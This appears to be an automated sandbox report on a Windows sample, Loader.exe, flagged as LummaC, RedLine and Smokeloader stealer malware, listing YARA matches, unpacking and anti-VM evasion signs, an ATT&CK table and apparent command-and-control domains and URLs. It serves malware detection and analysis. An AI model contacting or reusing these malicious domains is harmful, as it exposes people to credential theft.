Source: 00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0067B4B9	0_3_0067B4B9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0067B4B9	0_3_0067B4B9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0067B4B9	0_3_0067B4B9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0067B4B9	0_3_0067B4B9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CE71	0_3_0068CE71
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CE71	0_3_0068CE71
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D254	0_3_0068D254
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D254	0_3_0068D254
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CC28	0_3_0068CC28
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CC28	0_3_0068CC28
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D424	0_3_0068D424
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D424	0_3_0068D424
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D33C	0_3_0068D33C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D33C	0_3_0068D33C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D0F8	0_3_0068D0F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D0F8	0_3_0068D0F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CF9E	0_3_0068CF9E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CF9E	0_3_0068CF9E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CE71	0_3_0068CE71
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CE71	0_3_0068CE71
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D254	0_3_0068D254
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D254	0_3_0068D254
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CC28	0_3_0068CC28
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CC28	0_3_0068CC28
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D424	0_3_0068D424
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D424	0_3_0068D424
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D33C	0_3_0068D33C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D33C	0_3_0068D33C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D0F8	0_3_0068D0F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D0F8	0_3_0068D0F8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CF9E	0_3_0068CF9E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CF9E	0_3_0068CF9E

Source: C:\Users\user\Desktop\Loader.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568

Source: Loader.exe, 00000000.00000000.1719811158.0000000000462000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilemio> vs Loader.exe
Source: Loader.exe	Binary or memory string: OriginalFilenamesOdilemio> vs Loader.exe

Source: Loader.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2140034005.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2140310460.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.evad.winEXE@2/5@10/3

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4308

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\2b9925b9-3803-46dc-82f9-c273a8332338

Jump to behavior

Source: Loader.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Loader.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Loader.exe

ReversingLabs: Detection: 68%

Source: C:\Users\user\Desktop\Loader.exe

File read: C:\Users\user\Desktop\Loader.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
Source: C:\Users\user\Desktop\Loader.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1568

Source: C:\Users\user\Desktop\Loader.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Loader.exe

Unpacked PE file: 0.2.Loader.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Loader.exe

Unpacked PE file: 0.2.Loader.exe.400000.0.unpack

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_006762FC push 0000007Bh; retf	0_3_006764D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_006762FC push 0000007Bh; retf	0_3_006764D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_006762FC push 0000007Bh; retf	0_3_006764D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_006762FC push 0000007Bh; retf	0_3_006764D3
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691D63 push ebp; retf	0_3_00691D65
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691D63 push ebp; retf	0_3_00691D65
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CE71 push eax; iretd	0_3_0068D695
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CE71 push eax; iretd	0_3_0068D695
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00692576 push ebx; ret	0_3_00692577
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00692576 push ebx; ret	0_3_00692577
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691C50 push esi; ret	0_3_00691C59
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691C50 push esi; ret	0_3_00691C59
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068C354 push eax; ret	0_3_0068C355
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068C354 push eax; ret	0_3_0068C355
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0069190A push edx; ret	0_3_00691924
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0069190A push edx; ret	0_3_00691924
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691BFB push ebx; iretd	0_3_00691C03
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691BFB push ebx; iretd	0_3_00691C03
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068A6F4 push ss; retf	0_3_0068A6F5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068A6F4 push ss; retf	0_3_0068A6F5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068C9C8 push eax; iretd	0_3_0068C9E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068C9C8 push eax; iretd	0_3_0068C9E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691CC9 push ss; ret	0_3_00691CD1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691CC9 push ss; ret	0_3_00691CD1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068EDD4 pushad ; retn 0068h	0_3_0068EDD5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068EDD4 pushad ; retn 0068h	0_3_0068EDD5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CF9C pushfd ; iretd	0_3_0068CF9D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068CF9C pushfd ; iretd	0_3_0068CF9D
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D696 push eax; iretd	0_3_0068D695
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_0068D696 push eax; iretd	0_3_0068D695
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_3_00691D63 push ebp; retf	0_3_00691D65

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe TID: 6676

Thread sleep time: -150000s >= -30000s

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Loader.exe, Loader.exe, 00000000.00000003.1840010079.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1850474497.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775164828.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1775235067.0000000000671000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000002.2140158275.0000000000689000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000000.00000003.1800647255.0000000000689000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Loader.exe, 00000000.00000002.2140057200.000000000062E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%i%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: debonairnukk.xyz
Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: diffuculttan.xyz
Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: effecterectz.xyz
Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: deafeninggeh.biz
Source: Loader.exe, 00000000.00000002.2139856438.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: immureprech.biz

Source: C:\Users\user\Desktop\Loader.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 PowerShell	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Loader.exe	68%	ReversingLabs	Win32.Trojan.StealC
Loader.exe	100%	Avira	HEUR/AGEN.1306956
Loader.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://s.ytimg.com;	0%	Avira URL Cloud	safe
https://wrathful-jammy.cyou/api	100%	Avira URL Cloud	malware
https://diffuculttan.xyz/api	100%	Avira URL Cloud	malware
https://www.gstatic.cn/recaptcha/	0%	Avira URL Cloud	safe
https://deafeninggeh.biz/	100%	Avira URL Cloud	malware
https://awake-weaves.cyou/api#)	100%	Avira URL Cloud	malware
https://immureprech.biz/	100%	Avira URL Cloud	malware
https://immureprech.biz/pi	100%	Avira URL Cloud	malware
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	Avira URL Cloud	safe
http://www.valvesoftware.com/legal.htm	0%	Avira URL Cloud	safe
https://wrathful-jammy.cyou/	100%	Avira URL Cloud	malware
brendon-sharjen.biz	100%	Avira URL Cloud	malware
https://lv.queniujq.cn	0%	Avira URL Cloud	safe
https://deafeninggeh.biz:443/api	100%	Avira URL Cloud	malware
https://immureprech.biz/api	100%	Avira URL Cloud	malware
https://immureprech.biz/api;	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/api=(#	100%	Avira URL Cloud	malware
https://broadcast.st.dl.eccdnx.com	0%	Avira URL Cloud	safe
https://immureprech.biz/apij	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/api6(8	100%	Avira URL Cloud	malware
https://immureprech.biz/l#	100%	Avira URL Cloud	malware
https://effecterectz.xyz/	100%	Avira URL Cloud	malware
https://wrathful-jammy.cyou/apio	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
immureprech.biz	104.21.22.222	true	false	high
deafeninggeh.biz	104.21.32.1	true	true	unknown
brendon-sharjen.biz	104.21.32.1	true	true	unknown
sordid-snaked.cyou	unknown	unknown	true	unknown
diffuculttan.xyz	unknown	unknown	true	unknown
effecterectz.xyz	unknown	unknown	true	unknown
awake-weaves.cyou	unknown	unknown	true	unknown
wrathful-jammy.cyou	unknown	unknown	true	unknown
debonairnukk.xyz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sordid-snaked.cyou	false		high
deafeninggeh.biz	false		high
effecterectz.xyz	false		high
wrathful-jammy.cyou	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
awake-weaves.cyou	false		high
immureprech.biz	false		high
https://immureprech.biz/api	true	Avira URL Cloud: malware	unknown
debonairnukk.xyz	false		high
brendon-sharjen.biz	true	Avira URL Cloud: malware	unknown
diffuculttan.xyz	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
